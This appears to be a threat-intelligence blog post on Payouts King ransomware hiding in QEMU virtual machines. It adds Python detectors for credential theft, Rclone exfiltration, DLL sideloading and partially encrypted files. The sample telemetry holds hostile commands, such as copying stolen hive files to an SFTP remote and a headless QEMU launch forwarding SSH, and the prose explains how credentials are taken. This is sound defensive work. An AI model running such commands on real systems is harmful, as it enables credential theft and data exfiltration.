
Payouts King Ransomware

By Mezo in Ransomware

The Payouts King ransomware operation has adopted a highly evasive persistence technique: it runs QEMU on the compromised Windows host to start a hidden virtual machine, and that guest maintains a reverse SSH tunnel back to attacker infrastructure. Because the guest's activity is invisible to tools running on the host, the technique effectively bypasses traditional endpoint security controls.

QEMU is an open-source machine emulator and virtualizer that lets a complete guest operating system run as a virtual machine on the host. Host-based security products see only the QEMU process, its virtual disk files and its network traffic, not what runs inside the guest, so attackers use this blind spot to execute payloads, stage stolen data and hold open covert remote-access tunnels over SSH.

This tactic is not new. Similar abuse of QEMU has been observed in the 3AM ransomware intrusions, the LoudMiner cryptomining campaign and the CRON#TRAP phishing campaign.

Inside the STAC4713 Campaign

Security researchers have identified two major campaigns deploying QEMU in this way. One of them, tracked as STAC4713 and first observed in November 2025, has been directly linked to the Payouts King ransomware operation and attributed to the GOLD ENCOUNTER group.

GOLD ENCOUNTER is known for targeting hypervisors and deploying encryptors in VMware ESXi environments. In this campaign the attackers establish persistence by creating a scheduled task named TPMProfiler that launches a hidden, headless QEMU virtual machine with SYSTEM-level privileges, so the VM survives reboots and runs regardless of which user is logged on.

To avoid detection, the virtual disk images are stored under names and extensions that make them look like legitimate database and DLL files. QEMU's port forwarding is configured so that the guest can be reached covertly through reverse SSH tunnels. The guest runs Alpine Linux 3.22.0 and carries an attacker toolkit including AdaptixC2, Chisel, BusyBox and Rclone.

Initial Access and Exploitation Pathways

The attackers have been flexible about initial access, using whichever entry point the target environment offers. Early incidents involved exposed SonicWall VPN appliances, while more recent attacks exploited the CVE-2025-26399 flaw.

Additional intrusion methods observed in subsequent campaigns include:

  • Compromise of exposed Cisco SSL VPN services
  • Social engineering via Microsoft Teams, where attackers impersonate IT personnel
  • Delivery of malicious payloads through Quick Assist

These varied approaches highlight a blend of technical exploitation and human-targeted deception.

Post-Compromise Operations and Data Theft

Once inside a network, the attackers use post-exploitation techniques to harvest credentials and extend their foothold. The process typically starts by creating a Volume Shadow Copy through the VSS user interface (vssuirun.exe), after which NTDS.dit and the SAM and SYSTEM registry hives are copied out of the shadow copy over SMB into temporary directories. The shadow copy is needed because Windows keeps these files locked while it is running, and the SYSTEM hive is taken along because it holds the boot key required to decrypt the password hashes stored in the other two.

In later stages the legitimate ADNotificationManager.exe binary is abused to sideload a malicious vcruntime140_1.dll containing a Havoc C2 component: the executable resolves that DLL by name, so a trojanised copy placed in its directory is loaded in place of the real Visual C++ runtime and the implant runs under a trusted process. Stolen data is then exfiltrated with Rclone to remote SFTP servers.
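The credential-theft and exfiltration steps above leave a recognisable sequence in endpoint telemetry. The following is an added example (not code from the original article or from any vendor report) that tags individual Sysmon-style events and then looks for the whole chain per host: a vssuirun.exe launch, hive or NTDS.dit copies landing outside their normal directories, a DLL sideload from a user-writable directory, and an rclone run pointing at a remote. The event records, hostnames, paths and timestamps are constructed for the demo; the user-writable directory list and the "unsigned DLL in the EXE's own directory" sideload rule are heuristics, not campaign indicators.

```python
import re
from collections import defaultdict

# Constructed sample telemetry in a Sysmon-like shape (process create = 1,
# image load = 7, file create = 11). Hosts, users, paths and timestamps are
# made up for this example; they are not indicators from the campaign.
SAMPLE_EVENTS = [
    {"ts": "2025-11-12T02:10:05", "host": "DC01", "event": 1, "user": "CORP\\svc-backup",
     "image": r"C:\Windows\System32\vssuirun.exe", "cmdline": "vssuirun.exe"},
    {"ts": "2025-11-12T02:11:40", "host": "DC01", "event": 11, "user": "CORP\\svc-backup",
     "image": r"C:\Windows\System32\cmd.exe", "target": r"C:\Windows\Temp\tmp_x\ntds.dit"},
    {"ts": "2025-11-12T02:11:42", "host": "DC01", "event": 11, "user": "CORP\\svc-backup",
     "image": r"C:\Windows\System32\cmd.exe", "target": r"C:\Windows\Temp\tmp_x\SYSTEM"},
    {"ts": "2025-11-12T02:30:00", "host": "WS07", "event": 7, "user": "CORP\\jdoe",
     "image": r"C:\Users\Public\ADNotificationManager.exe",
     "loaded": r"C:\Users\Public\vcruntime140_1.dll", "signed": False},
    {"ts": "2025-11-12T02:45:13", "host": "WS07", "event": 1, "user": "CORP\\jdoe",
     "image": r"C:\ProgramData\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Windows\Temp\tmp_x sftp-remote:/in --transfers 8"},
    # Benign control: the genuine runtime DLL loaded from System32 by an application.
    {"ts": "2025-11-12T09:00:00", "host": "WS03", "event": 7, "user": "CORP\\asmith",
     "image": r"C:\Office\WINWORD.EXE",
     "loaded": r"C:\Windows\System32\vcruntime140_1.dll", "signed": True},
]

HIVE_NAMES = {"ntds.dit", "sam", "system", "security"}
# Where these files legitimately live; a copy anywhere else is worth a look.
EXPECTED_HIVE_DIRS = (r"c:\windows\system32\config", r"c:\windows\ntds")
# Directories a standard user can write to (heuristic, not exhaustive).
USER_WRITABLE = (r"c:\users\public", r"c:\programdata", r"c:\windows\temp", r"\appdata")
# rclone remotes look like "name:path"; a Windows drive letter is only one char.
RCLONE_REMOTE_RE = re.compile(r"(?:^|\s)[a-z0-9_-]{2,}:", re.I)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _dirname(path):
    return path.replace("/", "\\").rsplit("\\", 1)[0].lower()


def classify(ev):
    """Return the technique tags a single event matches (empty list if none)."""
    tags = []
    if ev["event"] == 1:
        image = _basename(ev["image"])
        cmd = ev.get("cmdline", "")
        if image == "vssuirun.exe":
            tags.append("vss-ui-shadow-copy")
        if image == "rclone.exe" and ("sftp" in cmd.lower() or RCLONE_REMOTE_RE.search(cmd)):
            tags.append("rclone-exfil")
    elif ev["event"] == 11:
        target = ev["target"]
        if _basename(target) in HIVE_NAMES and not _dirname(target).startswith(EXPECTED_HIVE_DIRS):
            tags.append("credential-hive-copy")
    elif ev["event"] == 7:
        dll_dir = _dirname(ev["loaded"])
        # Sideload heuristic: DLL loaded from the host EXE's own directory,
        # that directory is user-writable, and the DLL is not signed.
        if (dll_dir == _dirname(ev["image"]) and any(w in dll_dir for w in USER_WRITABLE)
                and not ev.get("signed", True)):
            tags.append("dll-sideload")
    return tags


# Chains worth escalating when every step has been seen on one host.
CHAINS = {
    "credential-theft": ("vss-ui-shadow-copy", "credential-hive-copy"),
    "c2-and-exfil": ("dll-sideload", "rclone-exfil"),
}


def tags_by_host(events):
    """Collect distinct technique tags per host in chronological order."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        for tag in classify(ev):
            if tag not in per_host[ev["host"]]:
                per_host[ev["host"]].append(tag)
    return dict(per_host)


def matched_chains(events):
    """Hosts on which every step of a known chain has been observed."""
    result = {}
    for host, tags in tags_by_host(events).items():
        hits = [name for name, steps in CHAINS.items() if all(s in tags for s in steps)]
        if hits:
            result[host] = hits
    return result


if __name__ == "__main__":
    for host, chains in matched_chains(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(chains)}")
```

The single-event tags are deliberately loose (vssuirun.exe and rclone are legitimate tools); the signal comes from requiring the steps of a chain on the same host, which is why the benign WINWORD.EXE load of the real runtime from System32 produces nothing.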

Ransomware Capabilities and Encryption Strategy

The Payouts King ransomware itself is technically sophisticated. It uses extensive obfuscation and anti-analysis techniques to evade detection, maintains persistence through scheduled tasks, and disables security tools via low-level system calls, sidestepping the user-mode API hooks on which many security products rely.

Files are encrypted with AES-256 in CTR mode, with RSA-4096 protecting the AES key material so that only the holder of the attackers' private key can recover it. For larger files the ransomware encrypts intermittently, processing only portions of each file, which sharply reduces encryption time while still rendering the file unusable. Ransom notes direct victims to dark web leak sites, adding the threat of data exposure to the pressure to pay.
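Intermittent encryption has a forensic side effect worth knowing during triage: a partially encrypted file alternates between chunks that look like random data and chunks of the original content, a pattern that almost never occurs naturally. The following is an added example (not the ransomware's code and not from the original article) that scores a file chunk by chunk with Shannon entropy, reports which byte ranges were encrypted, and separates untouched, fully encrypted and intermittently encrypted files. The sample "document", the 4 KiB-on / 12 KiB-off stride used to simulate the encryptor, and the entropy thresholds are assumptions for the demo; the real stride is not stated on this page.

```python
import math
import random

CHUNK = 4096          # triage granularity; encryptor strides are usually multiples of 4 KiB
HIGH_ENTROPY = 7.5    # bits/byte: ciphertext or compressed data (assumed threshold)
LOW_ENTROPY = 6.0     # bits/byte: typical text, office XML, code (assumed threshold)


def shannon_entropy(chunk):
    """Bits of entropy per byte over one chunk (0.0 for empty input)."""
    if not chunk:
        return 0.0
    counts = [0] * 256
    for b in chunk:
        counts[b] += 1
    n = len(chunk)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def chunk_entropies(data, chunk=CHUNK):
    return [shannon_entropy(data[i:i + chunk]) for i in range(0, len(data), chunk)]


def encrypted_ranges(data, chunk=CHUNK, high=HIGH_ENTROPY):
    """Byte ranges whose chunks are high-entropy, merged when adjacent."""
    ranges = []
    for i, e in enumerate(chunk_entropies(data, chunk)):
        if e < high:
            continue
        start, end = i * chunk, min((i + 1) * chunk, len(data))
        if ranges and ranges[-1][1] == start:
            ranges[-1] = (ranges[-1][0], end)
        else:
            ranges.append((start, end))
    return ranges


def classify_file(data, chunk=CHUNK, high=HIGH_ENTROPY, low=LOW_ENTROPY):
    """Separate untouched, fully encrypted and intermittently encrypted files.
    A wholly high-entropy file may simply be compressed (zip, jpeg); a file
    that mixes high- and low-entropy chunks is the distinctive signal."""
    ents = chunk_entropies(data, chunk)
    n_high = sum(e >= high for e in ents)
    n_low = sum(e <= low for e in ents)
    if ents and n_high == len(ents):
        return "fully-encrypted-or-compressed"
    if n_high and n_low:
        return "intermittently-encrypted"
    return "plaintext"


def make_sample_document(size=65536):
    """Constructed low-entropy 'document' standing in for a victim file."""
    line = b"Quarterly revenue report - internal - do not distribute.\n"
    return (line * (size // len(line) + 1))[:size]


def simulate_partial_encryption(data, encrypt_len=4096, skip_len=12288, seed=7):
    """Stand-in for the encryptor: overwrite encrypt_len bytes, skip skip_len,
    repeat. Seeded random bytes model AES-CTR output; the stride is an
    assumption for the demo, not the sample's real pattern. skip_len=0 gives
    a fully encrypted file."""
    rng = random.Random(seed)
    out = bytearray(data)
    for start in range(0, len(out), encrypt_len + skip_len):
        end = min(start + encrypt_len, len(out))
        out[start:end] = bytes(rng.getrandbits(8) for _ in range(end - start))
    return bytes(out)


if __name__ == "__main__":
    doc = make_sample_document()
    partial = simulate_partial_encryption(doc)
    print(classify_file(doc), classify_file(partial))
    print(encrypted_ranges(partial))
```

Run over a directory of suspect files, the recovered ranges also tell you how much of each file is still intact, which matters when deciding whether partially encrypted data (log files, databases with intact pages) can be salvaged without paying.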

Evidence suggests that this ransomware operation may be linked to former affiliates of the Black Basta group, based on overlapping tactics such as spam bombing, phishing via Microsoft Teams, and abuse of remote access tools.

Key Indicators of Compromise to Watch

To defend against this threat, organizations should monitor for the following warning signs:

  • Unauthorized installation or execution of QEMU, including renamed copies of its binaries, which can still be recognised by QEMU-specific command-line arguments
  • Suspicious scheduled tasks running with SYSTEM privileges that launch unfamiliar binaries
  • QEMU port-forwarding configuration or other unusual SSH port-forwarding activity
  • Outbound SSH tunnels on non-standard ports

Early detection of these indicators can significantly reduce the risk of prolonged compromise and data loss.
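The TPMProfiler task described earlier and the indicators listed above come together in the QEMU command line: the port forwarding, the disk image disguised as a database or DLL, the headless display setting and the SYSTEM account are all visible there. The following is an added example (not code from the original article or from any vendor) that parses QEMU arguments out of scheduled-task actions and process-creation records, flags renamed binaries by their argument vocabulary, and scores each finding. The task names, paths, ports and user names in the records are constructed for the demo; the severity scoring and the list of expected disk-image extensions are this example's own assumptions.

```python
import re

# Constructed sample records: scheduled-task actions and process starts with
# their command lines. Names, paths and ports are invented for this example.
SAMPLE_RECORDS = [
    {"name": "TPMProfiler", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"C:\ProgramData\TPM\qemu-system-x86_64.exe -m 1024"
                r" -drive file=C:\ProgramData\TPM\tpmcache.db,format=raw"
                r" -netdev user,id=n0,hostfwd=tcp::2222-:22 -device e1000,netdev=n0 -display none"},
    {"name": "dev-vm", "user": "CORP\\dev",
     "cmdline": r"C:\qemu\qemu-system-x86_64.exe -m 2048 -hda C:\vm\alpine.qcow2 -display sdl"},
    # Renamed binary: the file name gives nothing away, the arguments do.
    {"name": "svchost64", "user": "NT AUTHORITY\\SYSTEM",
     "cmdline": r"C:\Users\Public\svchost64.exe -drive file=C:\Users\Public\msvcr.dll,format=qcow2"
                r" -nic user,hostfwd=tcp:127.0.0.1:9922-:22 -display none"},
    {"name": "notepad", "user": "CORP\\jdoe", "cmdline": r"C:\Windows\notepad.exe C:\notes.txt"},
]

QEMU_EXE_RE = re.compile(r"^qemu-system-\w+(?:\.exe)?$", re.I)
# hostfwd=[tcp|udp]:[hostaddr]:hostport-[guestaddr]:guestport (QEMU user-mode networking)
HOSTFWD_RE = re.compile(r"hostfwd=(tcp|udp):([^:,\s]*):(\d+)-([^:,\s]*):(\d+)", re.I)
DRIVE_FILE_RE = re.compile(r"-drive\s+\S*?file=([^,\s]+)", re.I)
LEGACY_DISK_RE = re.compile(r"-(?:hda|hdb|hdc|hdd|cdrom)\s+(\S+)", re.I)
DISK_EXTS = {"qcow2", "qcow", "img", "raw", "vmdk", "vdi", "vhd", "vhdx", "iso"}
HEADLESS_FLAGS = ("-display none", "-nographic", "-daemonize")
# Two or more of these on one command line is QEMU whatever the EXE is called.
QEMU_ARG_HINTS = ("-netdev", "-nic ", "-drive", "-hda ", "-m ", "-device", "-display")


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def _ext(path):
    base = _basename(path)
    return base.rsplit(".", 1)[-1].lower() if "." in base else ""


def analyze(record):
    """Inspect one command line; return a finding dict, or None if it is not QEMU.
    Simplification: the executable path is taken up to the first space, so
    quoted paths containing spaces are not handled here."""
    cmd = record["cmdline"]
    exe = _basename(cmd.split()[0])
    named_qemu = bool(QEMU_EXE_RE.match(exe))
    if not named_qemu and sum(h in cmd for h in QEMU_ARG_HINTS) < 2:
        return None
    forwards = [(proto.lower(), int(hp), int(gp))
                for proto, _h, hp, _g, gp in HOSTFWD_RE.findall(cmd)]
    disks = DRIVE_FILE_RE.findall(cmd) + LEGACY_DISK_RE.findall(cmd)
    odd_disks = [d for d in disks if _ext(d) not in DISK_EXTS]
    reasons = []
    if not named_qemu:
        reasons.append("renamed-qemu-binary")
    if forwards:
        reasons.append("hostfwd")
    if any(gp == 22 for _p, _hp, gp in forwards):
        reasons.append("guest-ssh-exposed")
    if odd_disks:
        reasons.append("disguised-disk-image")
    if any(f in cmd for f in HEADLESS_FLAGS):
        reasons.append("headless")
    if record.get("user", "").upper().endswith("SYSTEM"):
        reasons.append("runs-as-system")
    severity = "high" if len(reasons) >= 3 else "medium" if reasons else "info"
    return {"name": record["name"], "severity": severity, "reasons": reasons,
            "forwards": forwards, "odd_disks": odd_disks}


def scan(records):
    """Findings for every record that looks like a QEMU launch."""
    return [f for f in (analyze(r) for r in records) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_RECORDS):
        print(f"[{f['severity']:6}] {f['name']}: {', '.join(f['reasons']) or 'qemu, nothing unusual'}")
```

The same parsing applies to scheduled-task XML exported with schtasks or to Sysmon process-creation events; the point of scoring rather than alerting on every QEMU launch is that developers do run QEMU legitimately, while a headless guest with a forwarded SSH port, a disk image called something.db and the SYSTEM account is not how anyone does that by accident.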
